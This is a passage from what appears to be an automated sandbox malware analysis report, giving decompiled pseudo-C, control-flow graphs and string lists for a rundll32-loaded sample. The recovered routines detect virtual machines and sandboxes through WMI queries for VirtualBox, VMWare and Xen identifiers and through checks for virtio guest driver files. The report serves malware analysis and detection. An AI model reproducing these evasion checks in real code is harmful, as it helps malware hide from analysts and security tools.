                				 *((long long*)(_t153 + 0xe8)) = 0;
                				 *((long long*)(_t153 + 0x3f8)) = _t153 + 0x348;
                				r9d = 0;
                				 *( *((intOrPtr*)(_t153 + 0x108)) + 0x198) =  *( *((intOrPtr*)(_t153 + 0x108)) + 0x198) * ( *((intOrPtr*)(_t153 + 0x2a0)) + 0x3b8);
                				 *( *((intOrPtr*)(_t153 + 0x108)) + 0x128) =  *( *((intOrPtr*)(_t153 + 0x108)) + 0x128) ^  *((intOrPtr*)(_t153 + 0x240)) + 0x000002e8;
                				_t141 =  *((intOrPtr*)(_t153 + 0x628));
                				 *(_t202 + 0x48) =  *( *((intOrPtr*)(_t153 + 0x160)) + 0x70) ^ 0x000014c7;
                				 *((long long*)(_t202 + 0x40)) = 0;
                				 *(_t202 + 0x38) = 1;
                				 *(_t202 + 0x30) = _t141;
                				 *(_t202 + 0x28) = 0;
                				 *(_t202 + 0x20) = 0;
                				NtMapViewOfSection(_t215, _t213, _t211, _t209, _t188);
                				 *(_t153 + 0x404) = _t141;
                				if (_t141 == 0) goto 0x535f588c;
                				 *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x298) =  *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x298) ^  *( *((intOrPtr*)(_t153 + 0x108)) + 0x398) * 0x00000651;
                				 *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x420) =  *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x420) * 0x8f1;
                				goto 0x535f59c8;
                				 *(_t202 + 0x38) = _t193 + 0x1582;
                				r10d = _t189 - 0x3c3;
                				 *(_t202 + 0x30) = r10d;
                				r9d =  &(_t211[0x545]);
                				 *(_t202 + 0x28) = _t153;
                				r8d = _t193 + 0x1355;
                				 *(_t202 + 0x20) = _t189;
                				_t120 = _t215 - 0x6c3;
                				E00007FFA7FFA535F65D4(_t124, _t193 + 0x1582, _t153,  *((intOrPtr*)(_t153 + 0x2a0)), _t193, _t153 + 0xe8, _t207);
                				goto 0x535f59c2;
                				_t154 =  *((intOrPtr*)(_t202 + 0xc0));
                				r13d =  *(_t202 + 0xb0);
                				 *(_t154 + 0x3c0) =  *(_t154 + 0x3c0) ^ _t120 ^ r13d;
                				r10d =  *(_t154 + 0x420);
                				r9d =  *(_t154 + 0x248);
                				r9d = r9d ^ r13d;
                				r8d =  *(_t154 + 0x168);
                				r8d = r8d &  *(_t154 + 0x3c8);
                				r10d = r10d * r15d;
                				_t150 =  *((intOrPtr*)(_t154 + 0x230)) +  *(_t154 + 0x3c8);
                				 *(_t154 + 0x448) =  *(_t154 + 0x448) ^ r14d * r8d *  *(_t154 + 0x4b8);
                				 *((intOrPtr*)(_t154 + 0x130)) =  *((intOrPtr*)(_t154 + 0x130)) + _t150;
                				 *((long long*)(_t202 + 0x40)) = _t150;
                				r12d = r12d * r12d;
                				 *(_t202 + 0x38) = r12d;
                				 *(_t202 + 0x30) =  *(_t154 + 0x318) & 0x00001fda;
                				 *(_t202 + 0x28) = r10d;
                				 *(_t202 + 0x20) = _t193 & 0x000011f1 ^  *(_t154 + 0x320);
                				_t118 = E00007FFA7FFA535F615C(_t150, _t154,  *(_t154 + 0x300) * 0x0000145c |  *(_t154 + 0x170), _t154, _t153 + 0xe8, _t206);
                				 *(_t154 + 0x170) =  *(_t154 + 0x170) + _t120;
                				r13d = r13d - (_t120 | r14d);
                				 *((intOrPtr*)(_t154 + 0x310)) =  *((intOrPtr*)(_t154 + 0x310)) + r13d *  *(_t154 + 0x3a0);
                				return _t118;
                			}


                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Section$CreateView
                • String ID:
                • API String ID: 1585966358-0
                • Opcode ID: 27078456d6ec4aa6f734cb8f6f5f421d829cfd14c0dcfec4e5c627ca501a3fb4
                • Instruction ID: 128adba1762b03bf69f1ce167a6a7d349a38f1644cb1ba06fa342de9512fdaa7
                • Opcode Fuzzy Hash: 27078456d6ec4aa6f734cb8f6f5f421d829cfd14c0dcfec4e5c627ca501a3fb4
                • Instruction Fuzzy Hash: D0813877218B818AC754CF24E484BDA77A8F388B58F580236EF8E4B758DB38D655CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1094 215205ce3a0-215205ce3c7 call 215205d0410 1097 215205ce3cd-215205ce403 SysAllocString * 2 1094->1097 1098 215205ce5ab-215205ce5b3 1094->1098 1099 215205ce45a-215205ce462 1097->1099 1100 215205ce405-215205ce408 1097->1100 1101 215205ce464-215205ce467 SysFreeString 1099->1101 1102 215205ce46d-215205ce475 1099->1102 1103 215205ce451-215205ce454 SysFreeString 1100->1103 1104 215205ce40a-215205ce426 1100->1104 1101->1102 1105 215205ce59d-215205ce5aa 1102->1105 1106 215205ce47b-215205ce48b 1102->1106 1103->1099 1109 215205ce430-215205ce432 1104->1109 1107 215205ce491-215205ce49f 1106->1107 1108 215205ce576-215205ce599 CoUninitialize 1106->1108 1110 215205ce4a0-215205ce4bf 1107->1110 1108->1105 1109->1103 1111 215205ce434-215205ce44b CoUninitialize 1109->1111 1116 215205ce572 1110->1116 1117 215205ce4c5-215205ce4e1 1110->1117 1111->1103 1116->1108 1120 215205ce4e7-215205ce4e9 1117->1120 1121 215205ce559-215205ce56a 1120->1121 1122 215205ce4eb-215205ce4f3 1120->1122 1121->1110 1127 215205ce570 1121->1127 1122->1121 1123 215205ce4f5-215205ce4f7 1122->1123 1125 215205ce54f-215205ce553 VariantClear 1123->1125 1126 215205ce4f9-215205ce50c call 215205f9740 1123->1126 1125->1121 1130 215205ce50e-215205ce521 call 215205f9740 1126->1130 1131 215205ce54d 1126->1131 1127->1108 1130->1131 1134 215205ce523-215205ce536 call 215205f9740 1130->1134 1131->1125 1134->1131 1137 215205ce538-215205ce54b call 215205f9740 1134->1137 1137->1125 1137->1131
                C-Code - Quality: 26%
                			E00000215215205CE3A0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v24;
                				long long _v32;
                				long long _v40;
                				intOrPtr _v56;
                				signed short _v64;
                				void* _v72;
                				long long _v80;
                				long long _v88;
                				void* _t53;
                				void* _t54;
                				signed char _t60;
                				intOrPtr _t98;
                				intOrPtr* _t114;
                				long long _t134;
                				long long _t135;
                				void* _t146;
                
                				_t135 = __rsi;
                				_a24 = _t134;
                				_v72 = _t134;
                				_a16 = _t134;
                				_t54 = E00000215215205D0410(_t53,  &_a24,  &_v72, __rsi); // executed
                				if (_t54 == 0) goto 0x205ce5ab;
                				_v24 = __rbx;
                				_v32 = _t135;
                				_v40 = __r14;
                				__imp__#2();
                				__imp__#2();
                				_t9 = _t134 + 1; // 0x1
                				r14d = _t9;
                				_t104 = __rax;
                				if (__rax == 0) goto 0x205ce45a;
                				if (__rax == 0) goto 0x205ce451;
                				_v80 =  &_a16;
                				_t13 = _t134 + 0x30; // 0x30
                				r9d = _t13;
                				_v88 = _t134;
                				_t145 =  *_a24;
                				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x205ce451;
                				r14d = 0;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v72 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				_t137 = _v32;
                				if (__rax == 0) goto 0x205ce46d;
                				__imp__#6();
                				if (r14d == 0) goto 0x205ce59d;
                				_t114 = _a16;
                				_a32 = _t134;
                				_a8 = 0;
                				if (_t114 == 0) goto 0x205ce576;
                				asm("o16 nop [eax+eax]");
                				_v88 =  &_a8;
                				r8d = 1; // executed
                				 *((intOrPtr*)( *_t114 + 0x20))();
                				if (_a8 == 0) goto 0x205ce572;
                				_v80 = _t134;
                				r8d = 0;
                				_v88 = _t134;
                				_t98 =  *_a32; // executed
                				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0x205ce559;
                				_t60 = _v64 & 0x0000ffff;
                				if (_t60 == 1) goto 0x205ce559;
                				if ((_t60 & 0x00000008) == 0) goto 0x205ce54f;
                				E00000215215205F9740(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
                				if (_t98 != 0) goto 0x205ce54d;
                				E00000215215205F9740(_t104, _v56, L"82441FX", _v32, _t145, _t146);
                				if (_t98 != 0) goto 0x205ce54d;
                				E00000215215205F9740(_t104, _v56, L"82371SB", _v32, _t145, _t146);
                				if (_t98 != 0) goto 0x205ce54d;
                				E00000215215205F9740(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
                				if (_t98 == 0) goto 0x205ce54f;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_a16 != 0) goto 0x205ce4a0;
                				goto 0x205ce576;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v72 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				dil = 1 - 3 >= 0;
                				return 0;
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1414631806-1350769890
                • Opcode ID: 4ee1411a084c1c66a2b76c8730bf5cb7fccef8219e481e6b74e7e5a8e5dd8aaa
                • Instruction ID: a688fc6f0106ad10e6b25759c2303b872343da138426628acff7c1b13386caa1
                • Opcode Fuzzy Hash: 4ee1411a084c1c66a2b76c8730bf5cb7fccef8219e481e6b74e7e5a8e5dd8aaa
                • Instruction Fuzzy Hash: 81611737312E61C6EB219F25E8886DC67A4FBA8B98F540152EE4E47B68EF38D545C700
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1140 215205cfa60-215205cfa87 call 215205d0410 1143 215205cfc54-215205cfc5c 1140->1143 1144 215205cfa8d-215205cfac3 SysAllocString * 2 1140->1144 1145 215205cfb1a-215205cfb22 1144->1145 1146 215205cfac5-215205cfac8 1144->1146 1147 215205cfb24-215205cfb27 SysFreeString 1145->1147 1148 215205cfb2d-215205cfb3a 1145->1148 1149 215205cfb11-215205cfb14 SysFreeString 1146->1149 1150 215205cfaca-215205cfae6 1146->1150 1147->1148 1148->1143 1151 215205cfb40-215205cfb4e 1148->1151 1149->1145 1154 215205cfaf0-215205cfaf2 1150->1154 1152 215205cfb54-215205cfb58 1151->1152 1153 215205cfc30-215205cfc4e CoUninitialize 1151->1153 1156 215205cfb60-215205cfb7f 1152->1156 1153->1143 1154->1149 1155 215205cfaf4-215205cfb0b CoUninitialize 1154->1155 1155->1149 1156->1153 1161 215205cfb85-215205cfba1 1156->1161 1163 215205cfba7-215205cfba9 1161->1163 1165 215205cfbfe-215205cfc0f 1163->1165 1166 215205cfbab-215205cfbb0 1163->1166 1165->1156 1173 215205cfc15 1165->1173 1167 215205cfbb2-215205cfbc6 StrStrIW 1166->1167 1168 215205cfbf4-215205cfbf8 VariantClear 1166->1168 1169 215205cfbc8-215205cfbdc StrStrIW 1167->1169 1170 215205cfc17-215205cfc2b VariantClear 1167->1170 1168->1165 1169->1170 1172 215205cfbde-215205cfbf2 StrStrIW 1169->1172 1170->1153 1172->1168 1172->1170 1173->1153
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                • API String ID: 4173814494-4167877488
                • Opcode ID: 3774e90ebb1ffb59e462e348ed298952ad424a19e35e36385dbe4d8072061f51
                • Instruction ID: 86f5e97a0a4bbce329b002fe15e6d733dd489628ebd6451e0e3cfa56800a0633
                • Opcode Fuzzy Hash: 3774e90ebb1ffb59e462e348ed298952ad424a19e35e36385dbe4d8072061f51
                • Instruction Fuzzy Hash: 8751E637302F65CAEB208F25E89869877A0FB98B98F545155DE4E53B68DF38D548C700
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1175 215205cf410-215205cf4fd call 215205f8ef0 * 2 GetWindowsDirectoryW call 215205d00a0 1182 215205cf4ff-215205cf504 Wow64DisableWow64FsRedirection 1175->1182 1183 215205cf50a-215205cf50f 1175->1183 1182->1183 1184 215205cf510-215205cf563 PathCombineW call 215205f8ef0 call 215205cd1d0 GetFileAttributesW 1183->1184 1189 215205cf569-215205cf570 1184->1189 1190 215205cf565-215205cf567 1184->1190 1189->1184 1192 215205cf572 1189->1192 1190->1189 1191 215205cf574 1190->1191 1193 215205cf579-215205cf589 1191->1193 1192->1193 1194 215205cf590-215205cf593 1193->1194 1195 215205cf5a2-215205cf5b1 1194->1195 1196 215205cf595-215205cf59e 1194->1196 1198 215205cf601-215205cf62a call 215205f59d0 1195->1198 1199 215205cf5b3-215205cf5b5 1195->1199 1196->1194 1197 215205cf5a0 1196->1197 1197->1198 1201 215205cf5b8-215205cf5bb 1199->1201 1203 215205cf5bd-215205cf5c6 1201->1203 1204 215205cf5ca-215205cf5d8 1201->1204 1203->1201 1205 215205cf5c8 1203->1205 1206 215205cf5df-215205cf5f4 GetCurrentProcess 1204->1206 1207 215205cf5da 1204->1207 1205->1206 1206->1198 1209 215205cf5f6-215205cf5fb Wow64RevertWow64FsRedirection 1206->1209 1207->1206 1209->1198
                C-Code - Quality: 55%
                			E00000215215205CF410(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
                				signed char _t60;
                				void* _t76;
                				void* _t80;
                				signed long long _t93;
                				signed long long _t107;
                				void* _t128;
                				signed long long _t133;
                				WCHAR* _t138;
                				void* _t141;
                				signed long long _t142;
                				void* _t144;
                
                				_t133 = __rdi;
                				_t68 = __ecx;
                				 *((long long*)(_t141 + 8)) = __rbx;
                				 *((long long*)(_t141 + 0x10)) = __rsi;
                				 *((long long*)(_t141 + 0x18)) = __rdi;
                				_t139 = _t141 - 0x5b0;
                				_t142 = _t141 - 0x6b0;
                				_t93 =  *0x2067c720; // 0xca1645d940e
                				 *(_t141 - 0x5b0 + 0x5a0) = _t93 ^ _t142;
                				 *((long long*)(_t142 + 0x30)) = L"System32\\drivers\\balloon.sys";
                				r8d = 0x208;
                				 *((long long*)(_t142 + 0x38)) = L"System32\\drivers\\netkvm.sys";
                				 *((long long*)(_t142 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
                				 *((long long*)(_t142 + 0x48)) = L"System32\\drivers\\viofs.sys";
                				 *((long long*)(_t142 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
                				 *((long long*)(_t142 + 0x58)) = L"System32\\drivers\\vioinput.sys";
                				 *((long long*)(_t142 + 0x60)) = L"System32\\drivers\\viorng.sys";
                				 *((long long*)(_t142 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
                				 *((long long*)(_t142 + 0x70)) = L"System32\\drivers\\vioser.sys";
                				 *((long long*)(_t142 + 0x78)) = L"System32\\drivers\\viostor.sys";
                				E00000215215205F8EF0(__ecx, 0, _t76, _t80, _t141 - 0x5b0 + 0x190, _t128, __rdi, _t144);
                				r8d = 0x208;
                				E00000215215205F8EF0(_t68, 0, _t76, _t80, _t139 - 0x80, _t128, _t133, _t144);
                				 *(_t142 + 0x28) = _t133;
                				GetWindowsDirectoryW(_t138);
                				if (E00000215215205D00A0() == 0) goto 0x205cf50a;
                				__imp__Wow64DisableWow64FsRedirection();
                				_t107 = _t133;
                				__imp__PathCombineW();
                				r8d = 0x200;
                				E00000215215205F8EF0(_t68, 0, 0, _t80, _t139 + 0x3a0, _t139 + 0x190, _t133,  *((intOrPtr*)(_t142 + 0x30 + _t107 * 8)));
                				E00000215215205CD1D0(_t68, L"System32\\drivers\\viostor.sys", _t139 + 0x3a0, _t139 + 0x190, L"Checking file %s ", _t139 - 0x80);
                				_t60 = GetFileAttributesW(??); // executed
                				if (_t60 == 0xffffffff) goto 0x205cf569;
                				if ((_t60 & 0x00000010) == 0) goto 0x205cf574;
                				if (_t107 + 1 - 0xa < 0) goto 0x205cf510;
                				goto 0x205cf579;
                				 *((intOrPtr*)(_t142 + 0x20)) = 0;
                				if ( *0x2067e430 == 8) goto 0x205cf5a2;
                				if (1 - 0x1e < 0) goto 0x205cf590;
                				goto 0x205cf601;
                				if ( *0x2152067E484 == dil) goto 0x205cf601;
                				if ( *0x2067e430 == 8) goto 0x205cf5ca;
                				if (1 - 0x1e < 0) goto 0x205cf5b8;
                				goto 0x205cf5df;
                				if ( *0x2152067E46C == dil) goto 0x205cf5df;
                				GetCurrentProcess();
                				 *((long long*)( *0x2152067E488))();
                				if ( *((intOrPtr*)(_t142 + 0x20)) == 0) goto 0x205cf601;
                				__imp__Wow64RevertWow64FsRedirection();
                				return E00000215215205F59D0(1,  *(_t139 + 0x5a0) ^ _t142, _t142 + 0x20, _t139 - 0x80);
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                • API String ID: 2137468328-3181514389
                • Opcode ID: da6447d01ef5b2ade75ee0643974bd2b849857eb3f01f09764cc032b8923eaac
                • Instruction ID: bed3a9b9e9e377a8a19497d78d749ff56a5dd7c56306a83195207638603b5699
                • Opcode Fuzzy Hash: da6447d01ef5b2ade75ee0643974bd2b849857eb3f01f09764cc032b8923eaac
                • Instruction Fuzzy Hash: 21515B33312F60C5EB60CB14E8582DA73A5FBE9794FA40162DE8E46BA8EF38C545C740
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1210 215205ce7d0-215205ce802 call 215205d0410 1213 215205ce808-215205ce84e SysAllocString * 2 1210->1213 1214 215205cea47-215205cea54 1210->1214 1215 215205ce850-215205ce853 1213->1215 1216 215205ce8a5-215205ce8b0 1213->1216 1217 215205ce89c-215205ce89f SysFreeString 1215->1217 1218 215205ce855-215205ce871 1215->1218 1219 215205ce8b2-215205ce8b5 SysFreeString 1216->1219 1220 215205ce8bb-215205ce8cb 1216->1220 1217->1216 1225 215205ce87b-215205ce87d 1218->1225 1219->1220 1221 215205ce8d1-215205ce8f6 1220->1221 1222 215205cea34-215205cea46 1220->1222 1223 215205cea14-215205cea2e CoUninitialize 1221->1223 1224 215205ce8fc 1221->1224 1223->1222 1226 215205ce900-215205ce91d 1224->1226 1225->1217 1227 215205ce87f-215205ce896 CoUninitialize 1225->1227 1232 215205ce923-215205ce93f 1226->1232 1233 215205cea10 1226->1233 1227->1217 1236 215205ce945-215205ce947 1232->1236 1233->1223 1237 215205ce949-215205ce94e 1236->1237 1238 215205ce977-215205ce9c3 1236->1238 1237->1238 1239 215205ce950-215205ce954 1237->1239 1243 215205ce9f3-215205ce9ff 1238->1243 1244 215205ce9c5-215205ce9ca 1238->1244 1240 215205ce96d-215205ce971 VariantClear 1239->1240 1241 215205ce956-215205ce969 call 215205f9740 1239->1241 1240->1238 1241->1240 1243->1233 1252 215205cea01-215205cea08 1243->1252 1244->1243 1246 215205ce9cc-215205ce9d0 1244->1246 1248 215205ce9d2-215205ce9e5 call 215205f9740 1246->1248 1249 215205ce9e9-215205ce9ed VariantClear 1246->1249 1248->1249 1249->1243 1252->1226 1254 215205cea0e 1252->1254 1254->1223
                C-Code - Quality: 16%
                			E00000215215205CE7D0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
                				void* __rbx;
                				void* _t74;
                				void* _t75;
                				void* _t93;
                				long long _t117;
                				long long _t119;
                				void* _t122;
                				intOrPtr* _t131;
                				long long _t156;
                				void* _t159;
                				void* _t160;
                				void* _t161;
                				void* _t168;
                				long long _t173;
                
                				_t156 = __rsi;
                				_t159 = _t160 - 0x47;
                				_t161 = _t160 - 0x90;
                				r15d = 0;
                				 *((long long*)(_t159 + 0x7f)) = _t173;
                				 *((long long*)(_t159 - 0x19)) = _t173;
                				 *((long long*)(_t159 + 0x77)) = _t173;
                				_t75 = E00000215215205D0410(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
                				if (_t75 == 0) goto 0x205cea47;
                				 *((long long*)(_t161 + 0x88)) = _t156;
                				 *((long long*)(_t161 + 0x80)) = __rdi;
                				 *((long long*)(_t161 + 0x78)) = __r12;
                				 *((long long*)(_t161 + 0x70)) = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0x205ce8a5;
                				if (__rax == 0) goto 0x205ce89c;
                				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
                				_t14 = _t173 + 0x30; // 0x30
                				r9d = _t14;
                				 *((long long*)(_t161 + 0x20)) = _t173;
                				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0x205ce89c;
                				r14d = r15d;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
                				 *((intOrPtr*)(_t117 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0x205ce8bb;
                				__imp__#6();
                				if (r14d == 0) goto 0x205cea34;
                				_t131 =  *((intOrPtr*)(_t159 + 0x77));
                				 *((long long*)(_t159 + 0x6f)) = _t173;
                				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
                				 *(_t159 - 0x11) = r15w;
                				 *((long long*)(_t159 - 0xf)) = _t117;
                				 *((long long*)(_t159 - 7)) = _t117;
                				 *((intOrPtr*)(_t159 + 1)) = 0;
                				 *((short*)(_t159 + 5)) = 0;
                				if (_t131 == 0) goto 0x205cea14;
                				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t131 + 0x20))();
                				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0x205cea10;
                				 *((long long*)(_t161 + 0x28)) = _t173;
                				r8d = 0;
                				 *((long long*)(_t161 + 0x20)) = _t173;
                				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
                				 *((intOrPtr*)(_t119 + 0x20))();
                				if (0 < 0) goto 0x205ce977;
                				if ( *(_t159 - 0x11) == r12w) goto 0x205ce977;
                				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x205ce96d;
                				E00000215215205F9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
                				_t92 =  !=  ? r12d : r15d;
                				__imp__#9();
                				 *(_t159 + 7) = r15w;
                				 *((long long*)(_t159 + 0x11)) = _t119;
                				 *((long long*)(_t159 + 9)) = _t119;
                				r8d = 0;
                				asm("movups xmm0, [ebp+0x7]");
                				 *((intOrPtr*)(_t159 + 0x19)) = 0;
                				 *((short*)(_t159 + 0x1d)) = 0;
                				asm("movsd xmm1, [ebp+0x17]");
                				asm("movups [ebp-0x11], xmm0");
                				 *((long long*)(_t161 + 0x28)) = _t173;
                				asm("movsd [ebp-0x1], xmm1");
                				 *((long long*)(_t161 + 0x20)) = _t173;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
                				if (0 < 0) goto 0x205ce9f3;
                				if ( *(_t159 - 0x11) == r12w) goto 0x205ce9f3;
                				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x205ce9e9;
                				E00000215215205F9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
                				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
                				if (_t93 != 0) goto 0x205cea10;
                				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0x205ce900;
                				goto 0x205cea14;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t93;
                			}

















                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                • API String ID: 1018877641-1142199694
                • Opcode ID: a780dd9e34307c8a827ecc1d16c4eeaa75148d7a098379656ac2af1612e76257
                • Instruction ID: be4762a26674e658d5c489d09d88b76cfad301ea38da4f8b1a0877fac29be7b9
                • Opcode Fuzzy Hash: a780dd9e34307c8a827ecc1d16c4eeaa75148d7a098379656ac2af1612e76257
                • Instruction Fuzzy Hash: FE811F37702F50CAEB60DF39E8983AD33A4FB98B88F5085569E4957A68DF38D159C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 26%
                			E00000215215205CE5C0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v24;
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				intOrPtr _v72;
                				signed short _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* _t53;
                				void* _t54;
                				signed char _t60;
                				intOrPtr _t99;
                				intOrPtr* _t112;
                				long long _t133;
                				long long _t134;
                				void* _t145;
                
                				_t134 = __rsi;
                				_a24 = _t133;
                				_v88 = _t133;
                				_a16 = _t133;
                				_t54 = E00000215215205D0410(_t53,  &_a24,  &_v88, __rsi); // executed
                				if (_t54 == 0) goto 0x205ce7c3;
                				_v24 = __rbx;
                				_v32 = _t134;
                				_v40 = __r14;
                				_v48 = __r15;
                				__imp__#2();
                				_t135 = __rax;
                				__imp__#2();
                				r15d = 1;
                				_t102 = __rax;
                				r14d = r15d;
                				if (__rax == 0) goto 0x205ce684;
                				if (__rax == 0) goto 0x205ce67b;
                				_v96 =  &_a16;
                				_t13 = _t133 + 0x30; // 0x31
                				r9d = _t13;
                				_v104 = _t133;
                				_t144 =  *_a24;
                				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x205ce67b;
                				r14d = 0;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0x205ce692;
                				__imp__#6();
                				if (r14d == 0) goto 0x205ce7ab;
                				_t112 = _a16;
                				_a32 = _t133;
                				_a8 = 0;
                				if (_t112 == 0) goto 0x205ce78b;
                				_v104 =  &_a8;
                				r8d = r15d; // executed
                				 *((intOrPtr*)( *_t112 + 0x20))();
                				if (_a8 == 0) goto 0x205ce77c;
                				_v96 = _t133;
                				r8d = 0;
                				_v104 = _t133;
                				_t99 =  *_a32; // executed
                				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0x205ce763;
                				_t60 = _v80 & 0x0000ffff;
                				if (_t60 == r15w) goto 0x205ce763;
                				if ((_t60 & 0x00000008) == 0) goto 0x205ce759;
